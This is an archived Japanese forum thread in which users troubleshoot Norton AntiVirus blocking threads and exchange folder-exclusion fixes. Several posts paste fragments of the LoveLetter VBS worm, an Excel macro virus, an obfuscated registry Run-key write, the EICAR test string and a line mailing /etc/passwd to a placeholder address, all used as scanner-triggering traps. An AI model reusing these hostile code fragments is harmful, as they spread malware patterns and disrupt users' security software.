[過去ログ] ノートンがvbsウィルスのソースに誤反応3 (1002レス)
上下前次1-新
このスレッドは過去ログ倉庫に格納されています。
次スレ検索 歴削→次スレ 栞削→次スレ 過去ログメニュー
513: sage 2006/04/10(月) 21:58:13 ID:EhjrOlSY(1/2)調 AAS
テスト
514: 2006/04/10(月) 21:58:27 ID:??? AAS
>>512
キンタマです。
515: 2006/04/10(月) 21:59:34 ID:??? AAS
テスト
516: SAGE 2006/04/10(月) 22:01:07 ID:EhjrOlSY(2/2)調 AAS
テスト
517: [SAGE] 2006/04/10(月) 22:02:04 ID:??? AAS
テスト
518: [HAGE] 2006/04/10(月) 22:03:53 ID:??? AAS
テスト
519(1): 2006/04/12(水) 21:37:07 ID:oU4WH0fi(1/3)調 AAS
2chスレ:pachij
ここのすれの>>457のところにウイルスコードがあってあるので、
ノートンを立ち上げて、オプション→オートプロテクト→除外→新規→フォルダー?アイコン→
ローカルディスク(C)→プログラムファイル→Live2ちゃん→log→money4.2ch.net→pachij→
1140536153と1140536153.idx→すべてOKで閉じ
をしたのに、相変わらず上のスレではノートンが反応します。
再度除外項目を見たのですがきちんと除外項目に入ってました。
何故反応するのでしょうか??
520: 2006/04/12(水) 22:14:11 ID:oU4WH0fi(2/3)調 AAS
age
521: 2006/04/12(水) 22:35:04 ID:??? AAS
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!外部リンク[htm]:www.loadcash.biz" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
522(1): 519 2006/04/12(水) 22:53:09 ID:oU4WH0fi(3/3)調 AAS
他で聞きます。
523: ぴーこ名無しさん [・・・ ascii/1143450751/551 sage] 2006/04/13(木) 00:07:39 ID:??? AAS
>>519,522
・・・
>>1
2chブラウザのログ保存フォルダを「除外」に設定。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。
ログフォルダの場所等についてはお使いの2ちゃんねるブラウザの配布サイト・ヘルプ・スレ等で確認してください。
また、これとは別にワーム誤反応対策の設定もしてね。
外部リンク[php]:info.2ch.net
2chNIS問題まとめページ
外部リンク[html]:mickey.mirv.net
524(4): 2006/04/15(土) 16:37:44 ID:??? AAS
一昨日くらいからスレが見れなくなった
もちろんログ除外はしてあるのに、ノートン切ると見れる
どうして?ちなみに専ブラはギコナビ
525(1): 2006/04/15(土) 23:21:55 ID:??? AAS
>>524
誤反応
526: 2006/04/16(日) 09:18:27 ID:??? AAS
>>524
ログ除外以外にもやる事がある
>>1から読め
527: 2006/04/17(月) 20:53:52 ID:Se29R1qE(1)調 AAS
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!外部リンク[htm]:www.loadcash.biz" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
End Sub
<body onload=window()>
528(1): 2006/04/24(月) 17:37:20 ID:2zoSjqC7(1)調 AAS
にくちゃんねるでログ漁ってたら「ワーム検出で遮断」とかで結局目的のスレが見られないんだが諦めるしかないのかな。
htmlを拡張子の検出対象から外すのもアレだし、ワーム防止をオフにするのもあんまりよろしくなさそうなんだがね。
エロイ人でもエロくない人でも良いから詳しく知ってる人教えておくれ。
529(2): 2006/04/24(月) 20:13:42 ID:??? AAS
ふーん
530(1): 2006/04/30(日) 18:51:48 ID:??? AAS
>NIS2005の場合(多分NIS2006も同じ)
同じではない件に付いて
531: ぴーこ名無しさん [・・・ ascii/1143450751/551 sage] 2006/05/01(月) 23:31:23 ID:??? AAS
>>530
kwsk
532: ぴーこ名無しさん 2006/05/01(月) 23:32:01 ID:??? AAS
目欄が・・・orz...........
533: 2006/05/04(木) 23:17:25 ID:Gcx9i+9f(1)調 AAS
>>524と同じ症状です。
ここ1週間から出てる。
534: 2006/05/13(土) 05:26:57 ID:w+9rO7hg(1)調 AA×
![](/aas/pcqa_1109609938_534_EFEFEF_000000_240.gif)
535: 2006/05/13(土) 09:57:56 ID:??? AA×
![](/aas/pcqa_1109609938_535_EFEFEF_000000_240.gif)
536(1): 2006/05/15(月) 14:24:13 ID:??? AAS
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
537: [age] 2006/05/19(金) 20:06:44 ID:??? AAS
保守age
538(5): 2006/05/24(水) 01:38:47 ID:uOt5d8a9(1/4)調 AAS
Live2ch使ってます
NAV2003のAutoと手動の各除外にLive2chのログフォルダを指定してますが
このスレを表示すると、「VBS.LoveLetter.Var」の表示が出ます。
もちろんスレは見れない状態です。
どうすれば回避できますか?
539: 2006/05/24(水) 01:40:06 ID:??? AA×
![](/aas/pcqa_1109609938_539_EFEFEF_000000_240.gif)
540(3): ぴーこ名無しさん 2006/05/24(水) 02:15:51 ID:??? AAS
>>538
2chスレ:software
ログフォルダの指定を今一度確認してください。
以下の方法でウイルスの検出された場所がわかります。
検出先が2ちゃんねるブラウザのログフォルダに含まれていることを確認してね。
外部リンク:service1.symantec.com
Norton AntiVirus を起動し、[レポート] を選択する。
「活動ログ」 の右側に表示されているボタン、[レポートの表示] をクリックする。
541(1): 538 2006/05/24(水) 02:24:00 ID:??? AAS
>>540
グミクズがさっさと教えろや
542(1): 538 2006/05/24(水) 03:34:43 ID:uOt5d8a9(2/4)調 AAS
>>540
レスありがとうございます。
ログフォルダの指定は合っていました。
ウィルスの検出場所は、Live2ch\temp.htm、という所です。
このHTMLファイルをNAVの除外に設定すればいいんですかね?
それとも止めといたほうがいいですか?(このファイルを削除しても意味無しですよね)
よろしければレスお願いします。
>>541
ID隠して騙りは止めてね
543(2): 538 2006/05/24(水) 03:39:57 ID:uOt5d8a9(3/4)調 AAS
>>540
言い忘れました、ちなみに
Live2ch\temp.htmはログフォルダの外にあるファイルです。
544(1): ぴーこ名無しさん 2006/05/24(水) 04:07:14 ID:??? AAS
>>542-543
こちらでも確認しました。
Live2chのスレビューはdatをtemp.htmに通して表示するので反応しているようです。
temp.htmを除外に加えたら正常に表示されました。
注意点はウイルスコードをhtmlに埋め込むことになるのでtemp.htmをIEなどのwebブラウザでは開かないでください。
また、2ちゃんねるブラウザの脆弱性を突いたウイルスコードも出る可能性もありますのでノートン本スレや
お使いの2ちゃんねるブラウザのスレを見るようにしてください。
545(1): ぴーこ名無しさん 2006/05/24(水) 04:18:41 ID:??? AAS
>>544追記
Live2chのfaqが過去ログにありました。>>84 orz.......
参考に
2chスレ:software dat落ち
外部リンク[html]:220.254.5.211:8000 ミラー
546(2): 538 2006/05/24(水) 04:40:48 ID:uOt5d8a9(4/4)調 AAS
>>545
わざわざ再現までしていただき(しかもこんな夜中に)すみません。。。
temp.htmを除外に加えたら、無事このスレもLive2chで見る事が出来ました。
ありがとうございます!
しかも、過去ログまで探してくれたんですね、、、ありがとうございます。
547: 2006/05/24(水) 04:47:04 ID:??? AAS
>>546
俺も暇だからよー
548: 2006/05/24(水) 13:46:43 ID:??? AAS
>>546
俺も暇だからよー
549: cen ◆Am9xOgNMYE NG NG AAS
こんばんは。
>>17のソフトですが、対応するスクリプトを増やしました。
それから、検索の途中で中止できるようにしました。
550(1): cen ◆Am9xOgNMYE NG NG AAS
忘れてました。
こちらです。
外部リンク[html]:www.geocities.jp
551: 2006/05/31(水) 22:57:19 ID:??? AAS
bbs.cgiが更新されて>>4のような置換がちゃんと行われるようになった模様です
今後はウィルスコード貼っても反応しなくなるのかな
552(2): 2006/06/01(木) 00:54:09 ID:??? AAS
ダメですた
2chスレ:mnewsplus
>>4は完全に嘘であることが判明したので
次スレから削除かな
削除するだけだと「親切にも」追記する人が現れかねないから
別のテンプレに差し替えた方がいいかな
553: cen ◆Am9xOgNMYE 2006/06/01(木) 01:06:54 ID:??? AAS
>>552
>>4の置換で反応しないものもありますが、反応するものも
あります。完全に嘘というわけではないです。
554(1): 2006/06/01(木) 01:23:16 ID:??? AAS
どっちにしろ置換するようになったんだから>>4は大幅書き換えが必要
555: cen ◆Am9xOgNMYE 2006/06/02(金) 01:25:51 ID:??? AAS
こんばんは。
>>17のソフトですが、フォルダの設定によって検索できない場合
がありましたので、修正しました。
外部リンク[html]:www.geocities.jp
556(2): ぴーこ名無しさん 2006/06/02(金) 02:28:30 ID:??? AAS
>>4のテンプレ案です。
単純に文字参照を抜いてみました。
ノートンが反応するのは、ここの掲示板(2ちゃんねる)の仕様です。
ここは、時に他のウィルス対策ソフトが反応する場合もあります。
断言できることは、他のWebページでノートンが反応した場合は要注意ということ。
尚、ここはウイルス鑑定スレではありません。
危ないと思ったURLはラウンジ板等の”勇気が無くて見られない画像解説スレ”で診てもらいましょう。
外部リンク:find.2ch.net
■関連
ノートントラップ
外部リンク:ansitu.xrea.jp
ノートンインターネットセキュリティ@2ちゃんねる検索
外部リンク:find.2ch.net
557(1): 2006/06/02(金) 04:54:27 ID:??? AAS
>>556
Q. 2chが文字を置換しないのが悪いって聞いたんだけど
A. 情報が古いと思われます。2006年6月から置換するようになりましたが、
問題の文字を使わなくてもノートンが誤検出する文字列は作れるので
相変わらず反応する場合があります。
↑とか追加した方がいい。単に消すと
> 「親切にも」追記する人が現れかねないから
を防げない。
558: ぴーこ名無しさん 2006/06/03(土) 22:00:18 ID:??? AAS
Q. 2ちゃんねるが文字を置換しないのが悪いって聞いたんだけど
A. 2006年6月から置換するようになりましたが、
ノートンが誤検出する置換できないウィルスコードがあるので反応します。
ノートンがウイルスソースに誤反応の補足
外部リンク:ansitu.xrea.jp
ノートンが反応するのは、ここの掲示板(2ちゃんねる)の仕様です。
ここは、時に他のウィルス対策ソフトが反応する場合もあります。
断言できることは、他のWebページでノートンが反応した場合は要注意ということ。
尚、ここはウイルス鑑定スレではありません。
危ないと思ったURLはラウンジ板等の”勇気が無くて見られない画像解説スレ”で診てもらいましょう。
外部リンク:find.2ch.net
■関連
ノートントラップ
外部リンク:ansitu.xrea.jp
ノートンインターネットセキュリティ@2ちゃんねる検索
外部リンク:find.2ch.net
>>557
ノシシ
以前の説明をwikiに誘導する形にしてみました。
559: 2006/06/04(日) 10:03:06 ID:??? AAS
u
560: [age] 2006/06/04(日) 10:27:58 ID:??? AAS
保守
561: 2006/06/05(月) 19:23:06 ID:??? AAS
jane doe view使ってるんですが、
ノートントラップのウィルスコード貼られたスレ取得障害になったり、
ここのPC初心者板なんかはノートン切らないと来れません。
それで対策として書かれてる見て、
ノートンアンチウィルスの手動&オートの除外項目から、
viewのLogsフォルダを両方除外したんですが、
それでも駄目なままです。
他に何をしないといけないんでしょうか?
562: 2006/06/05(月) 19:44:30 ID:??? AAS
ここを読み直せ
563(2): 2006/06/06(火) 18:14:41 ID:yssu6HWa(1)調 AAS
ウィルスコードに反応したせいで、取得したログが消滅するのについては、
ログフォルダを除外すればいけるわけですが、
最近のウィルスコードは進化してて、
Autoblockで侵入感知反応してしまって、
2chの該当IPをアク禁にしてしまってるようなんです。
この場合の対応はどのようにすればよいでしょうか?
ノートン切らないと、ログを取得するどころか、
スレ単位、はなはだしくは板単位でアクセスすらできません。
564(1): 2006/06/06(火) 18:17:44 ID:??? AAS
>>563
リカバリしろデブ。
565(1): 2006/06/06(火) 18:30:21 ID:??? AAS
どの専ブラでも基本はログと書き込みフォルダを
除外すればおk?
566: ぴーこ名無しさん 2006/06/07(水) 01:17:37 ID:??? AAS
>>563
外部リンク[html]:mickey.mirv.net
>>565
外部リンク:ansitu.xrea.jp の3番目
詳しくはお使いの2ちゃんねるブラウザのヘルプ・スレ等で確認してください。
567: 2006/06/07(水) 18:58:51 ID:??? AAS
>>564
リカバリしろデブ。
568(3): <body onload=window()> [eip = eip + unescape("%u7030%u4300")] 2006/06/08(木) 03:34:49 ID:??? AAS
p + w * 10 <br> End Sub <br>
LOVE-LETTER-FOR-YOU
569: 2006/06/08(木) 03:36:10 ID:??? AAS
>568
570(1): 2006/06/08(木) 04:18:57 ID:??? AAS
さっきこのウィルスソースが2ちゃん掲示板に埋められてるのを見てしまったら、
ウィルスソフトは反応しなかったのですが、
いきなり2ちゃん掲示板の行間が広くなってしまいました。
ネットから接続を切って履歴とかTemporaryInternetFileとか全部削除してから
ウィルスチェックをしましたが反応なし。
これはブラウザの表示は変になったけど感染はしなかったということで大丈夫なのでしょうか?
ブラウザは専ブラじゃなくIEで、ウィルスソフトはソースネクストのウィルスセキュリティです。
571(1): 2006/06/08(木) 04:21:40 ID:??? AAS
570ですが補足です。
表示したスレは
2chスレ:newsplus
で、ここの>>5にそのソースが書いてありました。
572(1): 2006/06/08(木) 04:23:53 ID:??? AAS
>>570
行間が広くなるのはシリア語ブラクラじゃないのか?
573(1): 2006/06/08(木) 04:27:58 ID:??? AAS
>>571
5の最後の行にシリア語書いてあるね
574: 2006/06/08(木) 04:48:56 ID:??? AAS
>>572-573
レスありがとうございます。
シリア語ブラクラだと行間が広くなる以外の被害はないですか?
初めて聞いたもので>シリア語ブラクラ
さきほど念のためもう一度ウィルスチェックしましたがウィルス発見なしでした。
ブラウザと閉じるときにInternetTemporaryFileの中身を削除する設定にしてあるのですが
こちらも念のためInternetTemporaryFileの中身も確認してみましたが
cookieファイルとfaviconファイルのみ格納されていました。
「html」「htm」がなくなってれば大丈夫ですかね?
575(1): 2006/06/08(木) 05:11:57 ID:??? AA×
![](/aas/pcqa_1109609938_575_EFEFEF_000000_240.gif)
576: [age] 2006/06/12(月) 11:39:57 ID:??? AAS
このスレだと反応しないのは何で?
577(3): 2006/06/13(火) 14:13:25 ID:??? AAS
特定のスレに擬似ウィルスコード貼り付ける奴がいて困ってます。
ノートンのauto protect と手動スキャンで、
専ブラを除外するように設定してるんですが、スレを開くとエラーになってしまいます。
外部リンク:ansitu.xrea.jp
このサイトに書かれてる、信頼のアドレスを追加の設定はしました。
エラーのログを取得して、弾かれて、
有志さんの誤反応無効化スクリプトで書き換えて、
時間たつのまってから閲覧。しかもレス番はズレでわけわかめ
という状態です。
何かうまく弾く方法はないんでしょうか?
578(1): 2006/06/13(火) 20:49:00 ID:??? AAS
>>577
きちんと専ブラのログを除外する
579(1): 577 2006/06/14(水) 13:32:40 ID:??? AA×
>>578
![](/aas/pcqa_1109609938_579_EFEFEF_000000_240.gif)
580(1): 2006/06/17(土) 22:54:14 ID:??? AAS
>>2ё
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!外部リンク:www.loadcash.biz type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???
581(1): 2006/06/18(日) 17:52:54 ID:k4PxNBCi(1)調 AAS
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!外部リンク:www.loadcash.biz type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1))
582(1): 2006/06/18(日) 18:33:56 ID:??? AAS
583(1): [age] 2006/06/20(火) 00:04:58 ID:??? AAS
時々スレを転々としてると、急に変な改行になるんですが(文と文の隙間が全部空いてしまう)
これってウイルスに侵されてるのでしょうか?
584(1): 2006/06/20(火) 01:18:31 ID:??? AA×
![](/aas/pcqa_1109609938_584_EFEFEF_000000_240.gif)
585(1): dirsystem&"\MSKernel32.vbs 2006/06/20(火) 01:55:47 ID:??? AAS
>>568
586(1): あぼ〜ん 2006/06/20(火) 01:56:38 ID:??? AAS
>>568 >>585
587: 2006/06/20(火) 02:15:03 ID:??? AAS
>>583
シリア語ブラクラ
これを使うといい。
外部リンク[html]:www.geocities.jp
588(1): 2006/06/20(火) 23:24:54 ID:??? AAS
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!外部リンク:www.loadcash.biz type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1))
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
589(1): 2006/06/21(水) 12:18:24 ID:nQsDrOZ+(1)調 AAS
このスレに貼ってあるソースは大丈夫なのですか?
例えば>>580-581とか、>>588とか…
このスレだと反応ないんですが、何か特別なのでしょうか?
590: 2006/06/21(水) 14:23:42 ID:fhcCUte2(1)調 AAS
テスト
591: 2006/06/21(水) 20:24:45 ID:??? AAS
>>589
心配しすぎだと思うんです(><)
これが動いたら2chは大騒ぎになっちゃうと思うんです(><)
592: 。 2006/06/21(水) 23:50:37 ID:??? AAS
NGワードあぼ〜んすればおk
593(2): 2006/06/22(木) 20:26:16 ID:l9A+tZtH(1/2)調 AAS
誘導されてきました
導入しているマカフィーでスキャンかけても何の反応もなかったんですが、
ノートンのオンラインスキャンやってみると
感染ファイルが二個みつかって
C:\Program Files\gikoNavi\Log\2ch\aasaloon\Folder.idx は Bloodhound.Exploit.6 に感染しています。
C:\Program Files\gikoNavi\Log\2ch\aasaloon\subject.txt は Bloodhound.Exploit.6 に感染しています。
と言う表示が出ました。
これは危険なんでしょうか。それともただのウィルスコード?
594(3): 2006/06/22(木) 20:27:57 ID:??? AAS
>>593
ただのウィルスコード
これで消せる。
外部リンク[html]:www.geocities.jp
595(2): 2006/06/22(木) 20:28:13 ID:??? AAS
>>593
ノートンがvbsウィルスのソースに誤反応3
2chスレ:pcqa
596(1): 2006/06/22(木) 20:28:47 ID:??? AAS
>>594
cen乙
597: 2006/06/22(木) 20:30:04 ID:??? AAS
>>594-596
レス早いなw
598: 2006/06/22(木) 20:41:25 ID:??? AAS
粘着してリロードしながら監視してるんだろ?www
599(1): 2006/06/22(木) 20:44:02 ID:l9A+tZtH(2/2)調 AAS
>>594
ありがとうございます。
見分けるコツみたいなものはあるんですか?
600: 2006/06/22(木) 22:08:53 ID:??? AAS
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!外部リンク:www.loadcash.biz type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
601: 2006/06/23(金) 00:17:41 ID:??? AAS
ノートンがvbsウィルスのソースに誤反応3
2chスレ:pcqa
テンプレにでも入れるか・・・?
脳豚使うなら自力で何とかしろよ・・・
602: 2006/06/23(金) 00:18:16 ID:??? AAS
誤爆
603: 2006/06/23(金) 18:23:08 ID:??? AAS
___ゲームキャラ板でもモニカワイイモニカ様___
2chスレ:gamechara
このスレを開くと閲覧できないどころか
一回再起動しないとgame10鯖に繋がらなくなる障害が出るんですが
NGコードとかどう打って対処すればいいのですか?
604(1): 2006/06/23(金) 18:23:47 ID:6hQn7KgH(1)調 AAS
使用2chブラウザは Jane Doe Styleです。
605: 2006/06/23(金) 18:25:27 ID:??? AAS
>>604
回答めんどいからこのスレ内検索して
606: 2006/06/23(金) 22:47:16 ID:??? AAS
>>599
専用ブラウザでスレを取得した「だけ」で反応したら間違いなく誤反応なので心配無用。
スレに貼られたURLをクリックして反応したならウィルスの疑いあり。
てゆーか、やたらとクリックしちゃダメ。
607: [age] 2006/06/28(水) 16:58:31 ID:??? AAS
age
608: 2006/06/29(木) 15:09:12 ID:C6iUe2mV(1)調 AAS
Your attention,Please. みなさまに申し上げます
fire drill 火災避難訓練
609(1): [age] 2006/06/29(木) 19:41:48 ID:??? AAS
age
610: 2006/06/29(木) 21:38:29 ID:??? AAS
2chスレ:pcqa
111 名前:ひよこ名無しさん 投稿日:2006/06/29(木) 21:33:23 ID:P5JFBD43
キャップもらってパスワードもらって、名前欄に書き込んでも、
○★ にならなくて○◆になってしまうんですが、どうしてでしょうか
113 名前:愛新覚羅 ◆WjkbiI..A2 投稿日:2006/06/29(木) 21:34:04 ID:???
>>111
ウイルシかな
611: 2006/06/30(金) 22:56:15 ID:2Lq/lYYu(1)調 AAS
テスト
612(2): 2006/07/01(土) 00:07:11 ID:Dt6nkhA2(1/2)調 AAS
2chスレ:arc
コレって書き込んだ本人がウイルスに感染しているって事でしょうか?
613: 2006/07/01(土) 00:08:55 ID:??? AAS
>>612
ノートン先生を誤反応させるためにわざと貼ってるんだよ
614: 612 2006/07/01(土) 00:39:41 ID:Dt6nkhA2(2/2)調 AAS
ただ、これ書いた人がカードゲームのトレードスレに
自分のメルアド出してブログバレしてます
615: 2006/07/01(土) 23:18:07 ID:??? AAS
複雑な自爆では?
616: 2006/07/02(日) 19:36:03 ID:ytfN9V0/(1/2)調 AAS
ノートン2006でAutoprotectの設定で、ログのフォルダを除外したいのですが、
それらしい項目が分かりません。
Norton AntiVirusオプションの項目ではないのでしょうか?
617: 2006/07/02(日) 20:00:00 ID:ytfN9V0/(2/2)調 AAS
事故解決しました。
618(2): 2006/07/03(月) 19:55:32 ID:pfnK+d5L(1/2)調 AAS
専ブラ(Jane)での書き込みの妨害も先生の仕業?
更新かけて解決するのであれば(期限切れ)、
してやらんでもないのだが・・・。
619(1): 2006/07/03(月) 22:30:42 ID:??? AAS
>>618
> 更新かけて解決するのであれば(期限切れ)、
それはないな。FW(が入っているのであれば)一時的に切ってみるしか
620(3): 618 2006/07/03(月) 23:15:21 ID:pfnK+d5L(2/2)調 AAS
>>619
いや、プラウザからなら書き込めるんですよ。
ノートン有効→一部の板の閲覧不可(IE、専ブラ共に)
無効→共に閲覧は可能 専ブラでの書き込みが不可。
ってわけでこの板だけは、IEからしか書き込めないんです・・・。
まぁ、通信を許可すれば解決なんでしょうが・・・。
いろいろやってみます。 どもでした。
621(1): 2006/07/04(火) 02:40:17 ID:??? AAS
まったくの初心者ですが
ノートンインターネットセキュリティー2006での誤反応対策を教えてください
既出でしたらアンカーでもいいのでお願いします
622: 2006/07/04(火) 08:28:52 ID:??? AAS
>>621
>>1->>620を読め
623: 2006/07/04(火) 10:11:31 ID:??? AAS
「まったくの初心者」
だからどうした?このスレを100回読んで知識増やせ。
624(2): 2006/07/04(火) 20:16:10 ID:Bwi55Fwo(1)調 AAS
スレを開いたら突然ウィルスに感染したんですがurlを直接踏まなくても
感染するウィルスはあるんですか?
625: 2006/07/05(水) 11:14:56 ID:??? AAS
>>624
>>1->>620を読め
626: 2006/07/05(水) 17:10:28 ID:xPsQC9iJ(1)調 AA×
![](/aas/pcqa_1109609938_626_EFEFEF_000000_240.gif)
627(1): 2006/07/07(金) 03:17:23 ID:??? AAS
>>577
遅レスだけど一応。
外部リンク[html]:mickey.mirv.net
↑みて最新のアドレス設定しる
628: 2006/07/15(土) 01:31:41 ID:668g3rrq(1)調 AAS
こんなPCはネットにつなぐな! 3日間放置した無防備PCの結末は?
外部リンク:arena.nikkeibp.co.jp
以下すべて日本語対応で無料。
ブラウザ:Firefox 外部リンク:www.mozilla-japan.org
メーラー:Thunderbird 外部リンク:www.mozilla-japan.org
上記2種の拡張(外部リンク[html]:beau.g-com.ne.jp)
スパイウェア対策:外部リンク[html]:www.geocities.jp
ウィルス対策:avast! 外部リンク[html]:www.forest.impress.co.jp
適当なルーター:BUFFALO BBR-4HG 外部リンク[html]:netspeed.studio-radish.com
無料のウイルス対策ソフトなどのセキュリティソフト一覧
